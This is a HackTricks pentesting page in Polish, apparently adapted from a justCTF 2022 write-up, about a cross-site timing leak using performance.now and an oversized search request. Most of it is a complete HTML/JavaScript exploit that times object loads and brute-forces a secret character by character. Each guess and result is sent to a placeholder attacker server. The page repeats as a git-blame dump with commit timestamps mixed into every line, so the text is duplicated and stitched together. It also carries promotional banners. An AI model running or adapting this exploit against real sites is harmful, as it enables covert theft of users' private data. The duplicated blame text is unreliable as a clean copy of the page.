hacktricks/pentesting-web/xs-search/performance.now-+-force-heavy-task.md

# performance.now + Wymuś ciężkie zadanie

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**repozytorium hacktricks**](https://github.com/carlospolop/hacktricks) **i** [**repozytorium hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

**Wykorzystanie zaczerpnięte z [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**

W tym wyzwaniu użytkownik mógł wysłać tysiące znaków, a jeśli flaga była zawarta, znaki były odsyłane do bota. Dlatego, wysyłając dużą ilość znaków, atakujący mógł sprawdzić, czy flaga jest zawarta w wysłanym ciągu znaków, czy nie.

{% hint style="warning" %}
Początkowo nie ustawiłem szerokości i wysokości obiektu, ale później odkryłem, że jest to ważne, ponieważ domyślny rozmiar jest zbyt mały, aby miało to znaczenie dla czasu ładowania.
{% endhint %}
```html
<!DOCTYPE html>
<html>
<head>

</head>
<body>
<img src="https://deelay.me/30000/https://example.com">
<script>
fetch('https://deelay.me/30000/https://example.com')

function send(data) {
fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)
}

function leak(char, callback) {
return new Promise(resolve => {
let ss = 'just_random_string'
let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
let start = performance.now()
let object = document.createElement('object');
object.width = '2000px'
object.height = '2000px'
object.data = url;
object.onload = () => {
object.remove()
let end = performance.now()
resolve(end - start)
}
object.onerror = () => console.log('Error event triggered');
document.body.appendChild(object);
})

}

send('start')

let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')
let flag = 'justCTF{'

async function main() {
let found = 0
let notFound = 0
for(let i=0;i<3;i++) {
await leak('..')
}
for(let i=0; i<3; i++) {
found += await leak('justCTF')
}
for(let i=0; i<3; i++) {
notFound += await leak('NOT_FOUND123')
}

found /= 3
notFound /= 3

send('found flag:'+found)
send('not found flag:'+notFound)

let threshold = found - ((found - notFound)/2)
send('threshold:'+threshold)

if (notFound > found) {
return
}

// exploit
while(true) {
if (flag[flag.length - 1] === '}') {
break
}
for(let char of charset) {
let trying = flag + char
let time = 0
for(let i=0; i<3; i++) {
time += await leak(trying)
}
time/=3
send('char:'+trying+',time:'+time)
if (time >= threshold) {
flag += char
send(flag)
break
}
}
}
}

main()

</script>
</body>

</html>
```
<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family).
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com).
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**repozytorium hacktricks**](https://github.com/carlospolop/hacktricks) **i** [**repozytorium hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated to Polish 2024-02-11 01:46:25 +00:00			`# performance.now + Wymuś ciężkie zadanie`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`<details>`

Translated to Polish 2024-02-11 01:46:25 +00:00			`<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`* Pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź [PLAN SUBSKRYPCYJNY](https://github.com/sponsors/carlospolop)!`
			`* Odkryj [Rodzinę PEASS](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [NFT](https://opensea.io/collection/the-peass-family)`
			`* Zdobądź [oficjalne gadżety PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Dołącz do [💬](https://emojipedia.org/speech-balloon/) [grupy Discord](https://discord.gg/hRep4RUj7f) lub [grupy telegramowej](https://t.me/peass) lub śledź mnie na Twitterze 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [repozytorium hacktricks](https://github.com/carlospolop/hacktricks) i [repozytorium hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`</details>`

Translated to Polish 2024-02-11 01:46:25 +00:00			`Wykorzystanie zaczerpnięte z [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`W tym wyzwaniu użytkownik mógł wysłać tysiące znaków, a jeśli flaga była zawarta, znaki były odsyłane do bota. Dlatego, wysyłając dużą ilość znaków, atakujący mógł sprawdzić, czy flaga jest zawarta w wysłanym ciągu znaków, czy nie.`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`{% hint style="warning" %}`
Translated to Polish 2024-02-11 01:46:25 +00:00			`Początkowo nie ustawiłem szerokości i wysokości obiektu, ale później odkryłem, że jest to ważne, ponieważ domyślny rozmiar jest zbyt mały, aby miało to znaczenie dla czasu ładowania.`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00			`{% endhint %}`
			```html
			`<!DOCTYPE html>`
			`<html>`
			`<head>`

			`</head>`
			`<body>`
Translated to Polish 2024-02-11 01:46:25 +00:00			`<img src="https://deelay.me/30000/https://example.com">`
			`<script>`
			`fetch('https://deelay.me/30000/https://example.com')`

			`function send(data) {`
			`fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)`
			`}`

			`function leak(char, callback) {`
			`return new Promise(resolve => {`
			`let ss = 'just_random_string'`
			let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
			`let start = performance.now()`
			`let object = document.createElement('object');`
			`object.width = '2000px'`
			`object.height = '2000px'`
			`object.data = url;`
			`object.onload = () => {`
			`object.remove()`
			`let end = performance.now()`
			`resolve(end - start)`
			`}`
			`object.onerror = () => console.log('Error event triggered');`
			`document.body.appendChild(object);`
			`})`

			`}`

			`send('start')`

			`let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')`
			`let flag = 'justCTF{'`

			`async function main() {`
			`let found = 0`
			`let notFound = 0`
			`for(let i=0;i<3;i++) {`
			`await leak('..')`
			`}`
			`for(let i=0; i<3; i++) {`
			`found += await leak('justCTF')`
			`}`
			`for(let i=0; i<3; i++) {`
			`notFound += await leak('NOT_FOUND123')`
			`}`

			`found /= 3`
			`notFound /= 3`

			`send('found flag:'+found)`
			`send('not found flag:'+notFound)`

			`let threshold = found - ((found - notFound)/2)`
			`send('threshold:'+threshold)`

			`if (notFound > found) {`
			`return`
			`}`

			`// exploit`
			`while(true) {`
			`if (flag[flag.length - 1] === '}') {`
			`break`
			`}`
			`for(let char of charset) {`
			`let trying = flag + char`
			`let time = 0`
			`for(let i=0; i<3; i++) {`
			`time += await leak(trying)`
			`}`
			`time/=3`
			`send('char:'+trying+',time:'+time)`
			`if (time >= threshold) {`
			`flag += char`
			`send(flag)`
			`break`
			`}`
			`}`
			`}`
			`}`

			`main()`

			`</script>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00			`</body>`

			`</html>`
			```
			`<details>`

Translated to Polish 2024-02-11 01:46:25 +00:00			`<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`* Pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź [PLAN SUBSKRYPCYJNY](https://github.com/sponsors/carlospolop)!`
			`* Odkryj [Rodzinę PEASS](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [NFT](https://opensea.io/collection/the-peass-family).`
			`* Zdobądź [oficjalne gadżety PEASS & HackTricks](https://peass.creator-spring.com).`
			`* Dołącz do [💬](https://emojipedia.org/speech-balloon/) [grupy Discord](https://discord.gg/hRep4RUj7f) lub [grupy telegramowej](https://t.me/peass) lub śledź mnie na Twitterze 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [repozytorium hacktricks](https://github.com/carlospolop/hacktricks) i [repozytorium hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`</details>`